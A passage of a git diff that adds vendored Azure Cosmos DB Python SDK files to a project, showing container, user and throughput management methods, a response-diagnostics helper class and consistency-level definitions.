Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :keyword analytical_storage_ttl: Analytical store time to live (TTL) for items in the container. A value of + None leaves analytical storage off and a value of -1 turns analytical storage on with no TTL. Please + note that analytical storage can only be enabled on Synapse Link enabled accounts. + :returns: A `ContainerProxy` instance representing the new container. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The container creation failed. + :rtype: ~azure.cosmos.ContainerProxy + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples.py + :start-after: [START create_container] + :end-before: [END create_container] + :language: python + :dedent: 0 + :caption: Create a container with default settings: + :name: create_container + + .. 
literalinclude:: ../samples/examples.py + :start-after: [START create_container_with_settings] + :end-before: [END create_container_with_settings] + :language: python + :dedent: 0 + :caption: Create a container with specific settings; in this case, a custom partition key: + :name: create_container_with_settings + """ + definition = dict(id=id) # type: Dict[str, Any] + if partition_key is not None: + definition["partitionKey"] = partition_key + if indexing_policy is not None: + if indexing_policy.get("indexingMode") is IndexingMode.Lazy: + warnings.warn( + "Lazy indexing mode has been deprecated. Mode will be set to consistent indexing by the backend.", + DeprecationWarning + ) + definition["indexingPolicy"] = indexing_policy + if default_ttl is not None: + definition["defaultTtl"] = default_ttl + if unique_key_policy is not None: + definition["uniqueKeyPolicy"] = unique_key_policy + if conflict_resolution_policy is not None: + definition["conflictResolutionPolicy"] = conflict_resolution_policy + + analytical_storage_ttl = kwargs.pop("analytical_storage_ttl", None) + if analytical_storage_ttl is not None: + definition["analyticalStorageTtl"] = analytical_storage_ttl + + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + if offer_throughput is not None: + request_options["offerThroughput"] = offer_throughput + + data = self.client_connection.CreateContainer( + database_link=self.database_link, collection=definition, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, data) + + return ContainerProxy(self.client_connection, self.database_link, data["id"], properties=data) + + @distributed_trace + def create_container_if_not_exists( + self, + id, # type: str # pylint: disable=redefined-builtin + partition_key, # type: Any + indexing_policy=None, # type: Optional[Dict[str, Any]] + default_ttl=None, # type: Optional[int] + populate_query_metrics=None, # type: Optional[bool] + offer_throughput=None, # type: Optional[int] + unique_key_policy=None, # type: Optional[Dict[str, Any]] + conflict_resolution_policy=None, # type: Optional[Dict[str, Any]] + **kwargs # type: Any + ): + # type: (...) -> ContainerProxy + """Create a container if it does not exist already. + + If the container already exists, the existing settings are returned. + Note: it does not check or update the existing container settings or offer throughput + if they differ from what was passed into the method. + + :param id: ID (name) of container to read or create. + :param partition_key: The partition key to use for the container. + :param indexing_policy: The indexing policy to apply to the container. + :param default_ttl: Default time to live (TTL) for items in the container. If unspecified, items do not expire. + :param populate_query_metrics: Enable returning query metrics in response headers. + :param offer_throughput: The provisioned throughput for this offer. + :param unique_key_policy: The unique key policy to apply to the container. + :param conflict_resolution_policy: The conflict resolution policy to apply to the container. + :keyword str session_token: Token for use with Session consistency. 
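A sketch of `create_container` with an explicit partition key and indexing policy (the container name, paths, and TTL are placeholder assumptions; `PartitionKey` is importable from `azure.cosmos`):

    from azure.cosmos import PartitionKey

    container = db.create_container(
        id="line_items",
        partition_key=PartitionKey(path="/orderId", kind="Hash"),
        indexing_policy={
            "indexingMode": "consistent",  # "lazy" is deprecated, as the warning above notes
            "includedPaths": [{"path": "/*"}],
        },
        default_ttl=3600,  # items expire after one hour unless overridden per item
    )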
+        :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request.
+        :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource
+            has changed, and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :keyword analytical_storage_ttl: Analytical store time to live (TTL) for items in the container. A value of
+            None leaves analytical storage off and a value of -1 turns analytical storage on with no TTL. Please
+            note that analytical storage can only be enabled on Synapse Link enabled accounts.
+        :returns: A `ContainerProxy` instance representing the container.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The container read or creation failed.
+        :rtype: ~azure.cosmos.ContainerProxy
+        """
+
+        analytical_storage_ttl = kwargs.pop("analytical_storage_ttl", None)
+        try:
+            container_proxy = self.get_container_client(id)
+            container_proxy.read(
+                populate_query_metrics=populate_query_metrics,
+                **kwargs
+            )
+            return container_proxy
+        except CosmosResourceNotFoundError:
+            return self.create_container(
+                id=id,
+                partition_key=partition_key,
+                indexing_policy=indexing_policy,
+                default_ttl=default_ttl,
+                populate_query_metrics=populate_query_metrics,
+                offer_throughput=offer_throughput,
+                unique_key_policy=unique_key_policy,
+                conflict_resolution_policy=conflict_resolution_policy,
+                analytical_storage_ttl=analytical_storage_ttl,
+                **kwargs  # forward remaining request options (e.g. session_token) to the create call
+            )
+
+    @distributed_trace
+    def delete_container(
+        self,
+        container,  # type: Union[str, ContainerProxy, Dict[str, Any]]
+        populate_query_metrics=None,  # type: Optional[bool]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> None
+        """Delete a container.
+
+        :param container: The ID (name) of the container to delete. You can either
+            pass in the ID of the container to delete, a :class:`ContainerProxy` instance or
+            a dict representing the properties of the container.
+        :keyword str session_token: Token for use with Session consistency.
+        :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request.
+        :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource
+            has changed, and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the container couldn't be deleted.
+        :rtype: None
+        """
+        request_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+        if populate_query_metrics is not None:
+            warnings.warn(
+                "the populate_query_metrics flag does not apply to this method and will be removed in the future",
+                UserWarning,
+            )
+            request_options["populateQueryMetrics"] = populate_query_metrics
+
+        collection_link = self._get_container_link(container)
+        result = self.client_connection.DeleteContainer(collection_link, options=request_options, **kwargs)
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, result)
+
+    def get_container_client(self, container):
+        # type: (Union[str, ContainerProxy, Dict[str, Any]]) -> ContainerProxy
+        """Get a `ContainerProxy` for a container with specified ID (name).
+
+        :param container: The ID (name) of the container, a :class:`ContainerProxy` instance,
+            or a dict representing the properties of the container to be retrieved.
+        :returns: A `ContainerProxy` instance representing the retrieved container.
+        :rtype: ~azure.cosmos.ContainerProxy
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/examples.py
+                :start-after: [START get_container]
+                :end-before: [END get_container]
+                :language: python
+                :dedent: 0
+                :caption: Get an existing container, handling a failure if encountered:
+                :name: get_container
+        """
+        if isinstance(container, ContainerProxy):
+            id_value = container.id
+        else:
+            try:
+                id_value = container["id"]
+            except TypeError:
+                id_value = container
+
+        return ContainerProxy(self.client_connection, self.database_link, id_value)
+
+    @distributed_trace
+    def list_containers(self, max_item_count=None, populate_query_metrics=None, **kwargs):
+        # type: (Optional[int], Optional[bool], Any) -> Iterable[Dict[str, Any]]
+        """List the containers in the database.
+
+        :param max_item_count: Max number of items to be returned in the enumeration operation.
+        :keyword str session_token: Token for use with Session consistency.
+        :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: An Iterable of container properties (dicts).
+        :rtype: Iterable[dict[str, Any]]
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/examples.py
+                :start-after: [START list_containers]
+                :end-before: [END list_containers]
+                :language: python
+                :dedent: 0
+                :caption: List all containers in the database:
+                :name: list_containers
+        """
+        feed_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+        if populate_query_metrics is not None:
+            warnings.warn(
+                "the populate_query_metrics flag does not apply to this method and will be removed in the future",
+                UserWarning,
+            )
+            feed_options["populateQueryMetrics"] = populate_query_metrics
+
+        result = self.client_connection.ReadContainers(
+            database_link=self.database_link, options=feed_options, **kwargs
+        )
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, result)
+        return result
+
+    @distributed_trace
+    def query_containers(
+        self,
+        query=None,  # type: Optional[str]
+        parameters=None,  # type: Optional[List[str]]
+        max_item_count=None,  # type: Optional[int]
+        populate_query_metrics=None,  # type: Optional[bool]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> Iterable[Dict[str, Any]]
+        """List the properties for containers in the current database.
+
+        :param query: The Azure Cosmos DB SQL query to execute.
+        :param parameters: Optional array of parameters to the query. Ignored if no query is provided.
+        :param max_item_count: Max number of items to be returned in the enumeration operation.
+        :keyword str session_token: Token for use with Session consistency.
+        :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: An Iterable of container properties (dicts).
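A sketch of enumerating containers and obtaining a proxy with the methods above (names are assumed; `get_container_client` performs no network call):

    for container_props in db.list_containers(max_item_count=10):
        print(container_props["id"])

    items = db.get_container_client("line_items")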
+ :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + feed_options["populateQueryMetrics"] = populate_query_metrics + + result = self.client_connection.QueryContainers( + database_link=self.database_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def replace_container( + self, + container, # type: Union[str, ContainerProxy, Dict[str, Any]] + partition_key, # type: Any + indexing_policy=None, # type: Optional[Dict[str, Any]] + default_ttl=None, # type: Optional[int] + conflict_resolution_policy=None, # type: Optional[Dict[str, Any]] + populate_query_metrics=None, # type: Optional[bool] + **kwargs # type: Any + ): + # type: (...) -> ContainerProxy + """Reset the properties of the container. + + Property changes are persisted immediately. Any properties not specified + will be reset to their default values. + + :param container: The ID (name), dict representing the properties or + :class:`ContainerProxy` instance of the container to be replaced. + :param partition_key: The partition key to use for the container. + :param indexing_policy: The indexing policy to apply to the container. + :param default_ttl: Default time to live (TTL) for items in the container. + If unspecified, items do not expire. + :param conflict_resolution_policy: The conflict resolution policy to apply to the container. + :param populate_query_metrics: Enable returning query metrics in response headers. + :keyword str session_token: Token for use with Session consistency. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: Raised if the container couldn't be replaced. + This includes if the container with given id does not exist. + :returns: A `ContainerProxy` instance representing the container after replace completed. + :rtype: ~azure.cosmos.ContainerProxy + + .. admonition:: Example: + + .. 
literalinclude:: ../samples/examples.py
+                :start-after: [START reset_container_properties]
+                :end-before: [END reset_container_properties]
+                :language: python
+                :dedent: 0
+                :caption: Reset the TTL property on a container, and display the updated properties:
+                :name: reset_container_properties
+        """
+        request_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+        if populate_query_metrics is not None:
+            warnings.warn(
+                "the populate_query_metrics flag does not apply to this method and will be removed in the future",
+                UserWarning,
+            )
+            request_options["populateQueryMetrics"] = populate_query_metrics
+
+        container_id = self._get_container_id(container)
+        container_link = self._get_container_link(container_id)
+        parameters = {
+            key: value
+            for key, value in {
+                "id": container_id,
+                "partitionKey": partition_key,
+                "indexingPolicy": indexing_policy,
+                "defaultTtl": default_ttl,
+                "conflictResolutionPolicy": conflict_resolution_policy,
+            }.items()
+            if value is not None
+        }
+
+        container_properties = self.client_connection.ReplaceContainer(
+            container_link, collection=parameters, options=request_options, **kwargs
+        )
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, container_properties)
+
+        return ContainerProxy(
+            self.client_connection, self.database_link, container_properties["id"], properties=container_properties
+        )
+
+    @distributed_trace
+    def list_users(self, max_item_count=None, **kwargs):
+        # type: (Optional[int], Any) -> Iterable[Dict[str, Any]]
+        """List all the users in the database.
+
+        :param max_item_count: Max number of users to be returned in the enumeration operation.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: An Iterable of user properties (dicts).
+        :rtype: Iterable[dict[str, Any]]
+        """
+        feed_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+
+        result = self.client_connection.ReadUsers(
+            database_link=self.database_link, options=feed_options, **kwargs
+        )
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, result)
+        return result
+
+    @distributed_trace
+    def query_users(self, query, parameters=None, max_item_count=None, **kwargs):
+        # type: (str, Optional[List[str]], Optional[int], Any) -> Iterable[Dict[str, Any]]
+        """Return all users matching the given `query`.
+
+        :param query: The Azure Cosmos DB SQL query to execute.
+        :param parameters: Optional array of parameters to the query. Ignored if no query is provided.
+        :param max_item_count: Max number of users to be returned in the enumeration operation.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: An Iterable of user properties (dicts).
+        :rtype: Iterable[dict[str, Any]]
+        """
+        feed_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+
+        result = self.client_connection.QueryUsers(
+            database_link=self.database_link,
+            query=query if parameters is None else dict(query=query, parameters=parameters),
+            options=feed_options,
+            **kwargs
+        )
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, result)
+        return result
+
+    def get_user_client(self, user):
+        # type: (Union[str, UserProxy, Dict[str, Any]]) -> UserProxy
+        """Get a `UserProxy` for a user with specified ID.
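A sketch of `query_users` as defined above, with a parameterized query (the id prefix is an assumed placeholder):

    users = db.query_users(
        query="SELECT * FROM root r WHERE STARTSWITH(r.id, @prefix)",
        parameters=[{"name": "@prefix", "value": "svc-"}],
    )
    for user_props in users:
        print(user_props["id"])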
+
+        :param user: The ID (name), dict representing the properties or :class:`UserProxy`
+            instance of the user to be retrieved.
+        :returns: A `UserProxy` instance representing the retrieved user.
+        :rtype: ~azure.cosmos.UserProxy
+        """
+        if isinstance(user, UserProxy):
+            id_value = user.id
+        else:
+            try:
+                id_value = user["id"]
+            except TypeError:
+                id_value = user
+
+        return UserProxy(client_connection=self.client_connection, id=id_value, database_link=self.database_link)
+
+    @distributed_trace
+    def create_user(self, body, **kwargs):
+        # type: (Dict[str, Any], Any) -> UserProxy
+        """Create a new user in the database.
+
+        To update or replace an existing user, use the
+        :func:`DatabaseProxy.upsert_user` method.
+
+        :param body: A dict-like object with an `id` key and value representing the user to be created.
+            The user ID must be unique within the database, and consist of no more than 255 characters.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: A `UserProxy` instance representing the new user.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given user couldn't be created.
+        :rtype: ~azure.cosmos.UserProxy
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/examples.py
+                :start-after: [START create_user]
+                :end-before: [END create_user]
+                :language: python
+                :dedent: 0
+                :caption: Create a database user:
+                :name: create_user
+        """
+        request_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        user = self.client_connection.CreateUser(
+            database_link=self.database_link, user=body, options=request_options, **kwargs)
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, user)
+
+        return UserProxy(
+            client_connection=self.client_connection, id=user["id"], database_link=self.database_link, properties=user
+        )
+
+    @distributed_trace
+    def upsert_user(self, body, **kwargs):
+        # type: (Dict[str, Any], Any) -> UserProxy
+        """Insert or update the specified user.
+
+        If the user already exists in the database, it is replaced. If the user
+        does not already exist, it is inserted.
+
+        :param body: A dict-like object representing the user to update or insert.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: A `UserProxy` instance representing the upserted user.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given user could not be upserted.
+        :rtype: ~azure.cosmos.UserProxy
+        """
+        request_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        user = self.client_connection.UpsertUser(
+            database_link=self.database_link, user=body, options=request_options, **kwargs
+        )
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, user)
+
+        return UserProxy(
+            client_connection=self.client_connection, id=user["id"], database_link=self.database_link, properties=user
+        )
+
+    @distributed_trace
+    def replace_user(
+        self,
+        user,  # type: Union[str, UserProxy, Dict[str, Any]]
+        body,  # type: Dict[str, Any]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> UserProxy
+        """Replaces the specified user if it exists in the database.
+
+        :param user: The ID (name), dict representing the properties or :class:`UserProxy`
+            instance of the user to be replaced.
+        :param body: A dict-like object representing the user to replace.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
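A sketch of the user-management calls above (the user id is an assumed placeholder):

    user = db.create_user(body={"id": "reporting-user"})   # raises on a duplicate id
    user = db.upsert_user(body={"id": "reporting-user"})   # replaces if present, inserts otherwise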
+        :returns: A `UserProxy` instance representing the user after replace went through.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError:
+            If the replace failed or the user with given ID does not exist.
+        :rtype: ~azure.cosmos.UserProxy
+        """
+        request_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        replaced_user = self.client_connection.ReplaceUser(
+            user_link=self._get_user_link(user), user=body, options=request_options, **kwargs
+        )  # type: Dict[str, str]
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, replaced_user)
+
+        return UserProxy(
+            client_connection=self.client_connection,
+            id=replaced_user["id"],
+            database_link=self.database_link,
+            properties=replaced_user
+        )
+
+    @distributed_trace
+    def delete_user(self, user, **kwargs):
+        # type: (Union[str, UserProxy, Dict[str, Any]], Any) -> None
+        """Delete the specified user from the database.
+
+        :param user: The ID (name), dict representing the properties or :class:`UserProxy`
+            instance of the user to be deleted.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The user wasn't deleted successfully.
+        :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The user does not exist in the database.
+        :rtype: None
+        """
+        request_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        result = self.client_connection.DeleteUser(
+            user_link=self._get_user_link(user), options=request_options, **kwargs
+        )
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, result)
+
+    @distributed_trace
+    def read_offer(self, **kwargs):
+        # type: (Any) -> ThroughputProperties
+        """Get the ThroughputProperties object for this database.
+
+        If no ThroughputProperties already exist for the database, an exception is raised.
+
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: ThroughputProperties for the database.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exist for the database
+            or the throughput properties could not be retrieved.
+        :rtype: ~azure.cosmos.ThroughputProperties
+        """
+        warnings.warn(
+            "read_offer is a deprecated method name, use get_throughput instead",
+            DeprecationWarning
+        )
+        return self.get_throughput(**kwargs)
+
+    @distributed_trace
+    def get_throughput(self, **kwargs):
+        # type: (Any) -> ThroughputProperties
+        """Get the ThroughputProperties object for this database.
+
+        If no ThroughputProperties already exist for the database, an exception is raised.
+
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: ThroughputProperties for the database.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exist for the database
+            or the throughput properties could not be retrieved.
+        :rtype: ~azure.cosmos.ThroughputProperties
+        """
+        response_hook = kwargs.pop('response_hook', None)
+        properties = self._get_properties()
+        link = properties["_self"]
+        query_spec = {
+            "query": "SELECT * FROM root r WHERE r.resource=@link",
+            "parameters": [{"name": "@link", "value": link}],
+        }
+        throughput_properties = list(self.client_connection.QueryOffers(query_spec, **kwargs))
+        if not throughput_properties:
+            raise CosmosResourceNotFoundError(
+                status_code=StatusCodes.NOT_FOUND,
+                message="Could not find ThroughputProperties for database " + self.database_link)
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, throughput_properties)
+
+        return ThroughputProperties(offer_throughput=throughput_properties[0]["content"]["offerThroughput"],
+                                    properties=throughput_properties[0])
+
+    @distributed_trace
+    def replace_throughput(self, throughput, **kwargs):
+        # type: (Optional[int], Any) -> ThroughputProperties
+        """Replace the database-level throughput.
+
+        :param throughput: The throughput to be set (an integer).
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: ThroughputProperties for the database, updated with the new throughput.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError:
+            If no throughput properties exist for the database or if the throughput properties could not be updated.
+        :rtype: ~azure.cosmos.ThroughputProperties
+        """
+        response_hook = kwargs.pop('response_hook', None)
+        properties = self._get_properties()
+        link = properties["_self"]
+        query_spec = {
+            "query": "SELECT * FROM root r WHERE r.resource=@link",
+            "parameters": [{"name": "@link", "value": link}],
+        }
+        throughput_properties = list(self.client_connection.QueryOffers(query_spec))
+        if not throughput_properties:
+            raise CosmosResourceNotFoundError(
+                status_code=StatusCodes.NOT_FOUND,
+                message="Could not find ThroughputProperties for database " + self.database_link)
+        new_offer = throughput_properties[0].copy()
+        new_offer["content"]["offerThroughput"] = throughput
+        # Pass the updated offer (not the original) so the new throughput is applied explicitly.
+        data = self.client_connection.ReplaceOffer(offer_link=throughput_properties[0]["_self"],
+                                                   offer=new_offer, **kwargs)
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, data)
+        return ThroughputProperties(offer_throughput=data["content"]["offerThroughput"], properties=data)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/diagnostics.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/diagnostics.py
new file mode 100644
index 0000000..fc4076c
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/diagnostics.py
@@ -0,0 +1,86 @@
+# The MIT License (MIT)
+# Copyright (c) 2014 Microsoft Corporation
+
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+
+# The above copyright notice and this
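A sketch of the throughput methods defined above (the RU/s values are illustrative):

    current = db.get_throughput()
    print(current.offer_throughput)
    updated = db.replace_throughput(current.offer_throughput + 400)
    print(updated.offer_throughput)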
permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Diagnostic tools for Azure Cosmos database service operations. +""" + +from requests.structures import CaseInsensitiveDict + + +class RecordDiagnostics(object): + """Record Response headers from Cosmos read operations. + + The full response headers are stored in the ``headers`` property. + + Examples: + + >>> rh = RecordDiagnostics() + + >>> col = b.create_container( + ... id="some_container", + ... partition_key=PartitionKey(path='/id', kind='Hash'), + ... response_hook=rh) + + >>> rh.headers['x-ms-activity-id'] + '6243eeed-f06a-413d-b913-dcf8122d0642' + + """ + + _common = { + "x-ms-activity-id", + "x-ms-session-token", + "x-ms-item-count", + "x-ms-request-quota", + "x-ms-resource-usage", + "x-ms-retry-after-ms", + } + + def __init__(self): + self._headers = CaseInsensitiveDict() + self._body = None + self._request_charge = 0 + + @property + def headers(self): + return CaseInsensitiveDict(self._headers) + + @property + def body(self): + return self._body + + @property + def request_charge(self): + return self._request_charge + + def clear(self): + self._request_charge = 0 + + def __call__(self, headers, body): + self._headers = headers + self._body = body + + self._request_charge += float(headers.get("x-ms-request-charge", 0)) + + def __getattr__(self, name): + key = "x-ms-" + name.replace("_", "-") + if key in self._common: + return self._headers[key] + raise AttributeError(name) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/documents.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/documents.py new file mode 100644 index 0000000..f58f299 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/documents.py @@ -0,0 +1,444 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. 
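A sketch of using the `RecordDiagnostics` helper from diagnostics.py above as a `response_hook`; `db` is an assumed `DatabaseProxy`, and the header values are whatever the service returned:

    from azure.cosmos.diagnostics import RecordDiagnostics

    rd = RecordDiagnostics()
    db.read(response_hook=rd)   # the hook is invoked with (headers, body)
    print(rd.request_charge)    # accumulated from x-ms-request-charge
    print(rd.session_token)     # attribute access maps to the "x-ms-session-token" header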
+
+"""Classes and enums for documents in the Azure Cosmos database service.
+"""
+
+from . import _retry_options
+
+
+class DatabaseAccount(object):  # pylint: disable=too-many-instance-attributes
+    """Database account.
+
+    A DatabaseAccount is the container for databases.
+
+    :ivar str DatabasesLink:
+        The self-link for Databases in the databaseAccount.
+    :ivar str MediaLink:
+        The self-link for Media in the databaseAccount.
+    :ivar int MaxMediaStorageUsageInMB:
+        Attachment content (media) storage quota in MBs (Retrieved from gateway).
+    :ivar int CurrentMediaStorageUsageInMB:
+        Current attachment content (media) usage in MBs (Retrieved from gateway).
+        Value is returned from cached information updated periodically and
+        is not guaranteed to be real time.
+    :ivar dict ConsistencyPolicy:
+        UserConsistencyPolicy settings.
+    :ivar dict ConsistencyPolicy['defaultConsistencyLevel']:
+        The default consistency level.
+    :ivar int ConsistencyPolicy['maxStalenessPrefix']:
+        In bounded staleness consistency, the maximum allowed staleness in
+        terms of difference in sequence numbers (aka versions).
+    :ivar int ConsistencyPolicy['maxStalenessIntervalInSeconds']:
+        In bounded staleness consistency, the maximum allowed staleness in
+        terms of time interval.
+    :ivar boolean EnableMultipleWritableLocations:
+        Flag on the Azure Cosmos account that indicates if writes can take
+        place in multiple locations.
+    """
+
+    def __init__(self):
+        self.DatabasesLink = ""
+        self.MediaLink = ""
+        self.MaxMediaStorageUsageInMB = 0
+        self.CurrentMediaStorageUsageInMB = 0
+        self.ConsumedDocumentStorageInMB = 0
+        self.ReservedDocumentStorageInMB = 0
+        self.ProvisionedDocumentStorageInMB = 0
+        self.ConsistencyPolicy = None
+        self._WritableLocations = []
+        self._ReadableLocations = []
+        self._EnableMultipleWritableLocations = False
+
+    @property
+    def WritableLocations(self):
+        """The list of writable locations for a geo-replicated database account.
+        """
+        return self._WritableLocations
+
+    @property
+    def ReadableLocations(self):
+        """The list of readable locations for a geo-replicated database account.
+        """
+        return self._ReadableLocations
+
+
+class ConsistencyLevel(object):
+    """Represents the consistency levels supported for Azure Cosmos client
+    operations.
+
+    The requested ConsistencyLevel must match or be weaker than that provisioned
+    for the database account.
+
+    Consistency levels by order of strength are Strong, BoundedStaleness,
+    Session, ConsistentPrefix and Eventual.
+
+    :ivar str ConsistencyLevel.Strong:
+        Strong Consistency guarantees that read operations always return the
+        value that was last written.
+    :ivar str ConsistencyLevel.BoundedStaleness:
+        Bounded Staleness guarantees that reads are not too out-of-date. This
+        can be configured based on number of operations (MaxStalenessPrefix)
+        or time (MaxStalenessIntervalInSeconds).
+    :ivar str ConsistencyLevel.Session:
+        Session Consistency guarantees monotonic reads (you never read old data,
+        then new, then old again), monotonic writes (writes are ordered) and
+        read your writes (your writes are immediately visible to your reads)
+        within any single session.
+    :ivar str ConsistencyLevel.Eventual:
+        Eventual Consistency guarantees that reads will return a subset of
+        writes. All writes will eventually be available for reads.
+    :ivar str ConsistencyLevel.ConsistentPrefix:
+        ConsistentPrefix Consistency guarantees that reads will return some
+        prefix of all writes with no gaps. All writes will eventually be
+        available for reads.
